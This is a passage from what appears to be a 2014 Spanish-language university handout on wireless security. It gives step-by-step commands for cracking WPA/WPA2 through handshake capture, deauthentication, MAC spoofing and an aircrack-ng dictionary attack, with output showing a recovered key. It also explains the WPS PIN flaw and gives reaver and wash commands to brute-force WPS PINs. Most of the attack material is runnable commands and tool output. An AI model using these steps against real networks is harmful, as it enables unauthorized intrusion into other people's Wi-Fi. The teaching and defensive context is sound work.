A LA DERECHA, y ah debe aparecer el preciado handshake y a continuacin, el 4 paso.
4 Paso : Buscar la clave en el Dicionario :AIRCRACK,en otra consola
aircrack-ng redeswpa-01.cap

BSSID

ESSID

00:14:6C:7E:40:80

Encryption

teddy

WPA (1 handshake)

Choosing first network as target.

aircrack-ng redeswpa-01.cap -w dictionariowpa.dic

Aircrack-ng 1.4

[00:00:00] 2 keys tested (37.20 k/s)

KEY FOUND! [ 26111985 ]

Master Key

: CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E

Seguridad de Redes Inalmbricas 2014 Universidad Mayor de San Simn

Riber Paredes Milan

B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD

Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98
CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40
FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E
2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71

EAPOL HMAC

: 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB

RESUMEN WPA/WPA2
iwconfig // veremos las WLAN que tenemos en el equipos
airmon-ng // veremos las WLAN que tenemos en el equipos
iwconfig wlan0 // preparando para cambiar la MAC de nustro dispositivo
iwconfig wlan0 essid wlan0
macchanger m 00:11:22:33:44:55 //cambiando la MAC de nuestra WLAN
//Abribros otra consola
airmon-ng
start wlan0 ; control + c / esperamos unos segundos
airodump-ng mon0
airodump-ng c 6 w redeswpa -bssid 00:00:00:00:00:00 mon0
//Abribros otra consola
aireplay-ng -0 10 a 00:00:00:00:00:00 c MAC-STATION mon0 //desautentica para //capturer
el WPA handshake
aircrack-ng redeswpa-01.cap
aircrack-ng redeswpa-01.cap w nombre y ruta del diccionario.dic
Mtodo Resumido
airmon-ng start wlan0
airodump-ng mon0
airodump-ng c 6 w redeswpa --bssid 00:00:00:00:00:00 mon0
aireplay-ng -0 10 a 00:00:00:00:00:00 c MAC-STATION mon0
aircrack-ng redeswpa-01.cap
aircrack-ng redeswpa-01.cap w diccionario.dic

Seguridad de Redes Inalmbricas 2014 Universidad Mayor de San Simn

Riber Paredes Milan
Wi-Fi Protected Setup
WPS (Wi-Fi Protected Setup) es un estndar de 2007, promovido por la Wi-Fi Alliance para
facilitar la creacin de redes WLAN. Esta funcin est activa por defecto en un alto nmero de
routers comerciales. Contiene una vulnerabilidad que permite romper su seguridad en pocas
horas, as que es un vector de intrusin frecuente en redes inalmbricas.
WPS no es un mecanismo de seguridad por s, se trata de la definicin de diversos
mecanismos para facilitar la configuracin de una red WLAN segura con WPA2, pensados para
minimizar la intervencin del usuario en entornos domsticos o pequeas oficinas
(SOHO). Concretamente, WPS define los mecanismos a travs de los cuales los diferentes
dispositivos de la red obtienen las credenciales (SSID y PSK) necesarias para iniciar el proceso
de autenticacin.
Arquitectura tcnica
WPS define una arquitectura con tres elementos con roles diferentes:
Registrar (matriculador): dispositivo con la autoridad de generar o revocar las credenciales en
la red. Tanto un AP como cualquier otra estacin o PC de la red pueden tener este rol. Puede
haber ms de un Registrar en una red.
Enrollee (matriculado): dispositivo que solicita el acceso a la red WLAN.
Authenticator (autenticador): AP funcionando de proxy entre el Registrar y el Enrollee
Mtodos
WPS contempla cuatro tipos de configuraciones diferentes para el intercambio de
credenciales, PIN (Personal Identification Number), PBC (Push Button
Configuration), NFC (Near Field Communications) y USB (Universal Serial Bus):

PIN: tiene que existir un PIN asignado a cada elemento que vaya a asociarse a la red. Este
PIN tiene que ser conocido tanto por elRegistrar, como por el usuario (Enrollee). Es
necesaria la existencia de una interfaz (e.g. pantalla y teclado) para que el usuario pueda
introducir el mencionado PIN.
PBC: la generacin y el intercambio de credenciales son desencadenados a partir que el
usuario presiona un botn (fsico o virtual) en el AP (o en otro elemento Registrar) y otro en
el dispositivo. Notar que en el corto lapso de tiempo entre que se presiona el botn en el
AP y se presiona en el dispositivo, cualquier otra estacin prxima puede ganar acceso a
la red.
NFC: intercambio de credenciales a travs de comunicacin NFC. La tecnologa NFC,
basada en RFID permite la comunicacin sin hilos entre dispositivos prximos (0 - 20 cm).
Entonces, el dispositivo Enrollee se tiene que situar al lado del Registrar para
desencadenar la autenticacin. De esta manera, cualquier usuario que tenga acceso fsico
al Registrar, puede obtener credenciales vlidas.
USB: con este mtodo, las credenciales se transfieren mediante un dispositivo de memoria
flash (e.g. pendrive) desde el Registraral Enrollee.
Los mtodos PBC, NFC y USB pueden usarse para configurar dispositivos sin pantalla ni
teclado (e.g. impresoras, webcams, etc.), pero aunque el estndar contempla NFC y USB,
todava no se certifican estos mecanismos. Actualmente slo el mtodo PIN es obligatorio en
todas las estaciones para obtener la certificacin WPS; PBC es obligatorio slo en APs
Vulnerabilidades
Existe una falla de seguridad descubierta en diciembre del 2011 por Stefan Viehbck,la cual
afecta a routers inalmbricos que tienen la funcin WPS (tambin llamada QSS), la misma que
en dispositivos actuales se encuentra habilitada por defecto. La falla permite a un atacante
recuperar el PIN WPS y con la misma la clave pre-compartida de la
red WPA/WPA2 usando ataques de fuerza bruta en pocas horas. Los usuarios deben

Seguridad de Redes Inalmbricas 2014 Universidad Mayor de San Simn

Riber Paredes Milan
deshabilitar la funcin WPS como solucin temporal. En ciertos dispositivos, es posible que no
se pueda realizar dicho procedimiento

WEP/WPA/WPA2
SIN DICCIONARIO
airmon-ng
airmon-ng start wlan0
airodump-ng mon0
airodump-ng mon0 w reaverwps --beacons --channel 6 --bssid BSSID
Verification
reaver -i mon0 -b BSSID -c CH -e ESSID -d 15 vv; Warning 5 veces ni lo intenten
back Track 5
airmon-ng start wlan0
airodump-ng mon0
reaver -i mon0 b BSSID -c CH -e ESSID
back Track 5 r3
airmon-ng
airmon-ng start wlan0
wash -i mon0
reaver -i mon0 -b BSSID -c CH
CONOCIDO EL PIN
reaver -i mon0 -b BSSID -c canal -vv
reaver -i mon0 -b BSSID -p PIN -vv

Seguridad de Redes Inalmbricas 2014 Universidad Mayor de San Simn

Riber Paredes Milan
Ejemplo Utilizando Solo Back Track 5 R3
Se habilita el modo de monitor.
Comando airmon-ng start wlan0,debe quedar habilitada la interface mon0,que es con la que se
va a lanzar el ataque reaver.

Chequeamos las redes que tienen el WPS unlocked que se pueden atacar
(nota si dando el comando no aparece ninguna red, quiere decir que no hay redes con estas
caractersticas en el rea).
Comando wash -i mon0

Seguridad de Redes Inalmbricas 2014 Universidad Mayor de San Simn

Riber Paredes Milan
iniciamos nuestro ataque, el cual no es por paquetes como los anteriores, es por pines el
sistema testea todas las combinaciones posibles de un grupo de 8 dgitos (nota en las redes
que se vulneraron el pin era 12345670) en caso de haber otra combinacin se demora de 1 a 2
horas) que necesita para acceder a la clave.
Comando: reaver -i mon0 -b (bssid) -c (canal) -vv

Seguridad de Redes Inalmbricas 2014 Universidad Mayor de San Simn

Riber Paredes Milan
CHIPSETS SOPORTADOS:
Atheros AR2425 (ath5k)
Atheros AR5212
Atheros AR5213A
Atheros AR542x
Atheros AR9271 (Perfecto)
rtl8187L
rtl8187B
rtl8188ru
rtl8192cu
carl19170
ipw2000
rt2800pci
Intel 3945ABG
Intel 5100
iwl3954
iwl4965
zd1211rw
CHIPSETS CON SOPORTE PARCIAL:
ath5k
iwlagn
rtl2800usb (con compat-wireless)
b43 (Broadcom BCM4312 card)
rt73 (con driver rt2501usb)
rt2800usb (con compat-wireless-2011-12-30)
rtl819x
iwl4965
rtl8188ru
rtl8192cu
CHIPSETS NO SOPORTADOS:
iwl4965
RT3070L
Netgear WG111v3
rt2800usb (RTL3070)
rt2500
rt2570
Ipw2200
RT73usb
BCM4322
zd1211usb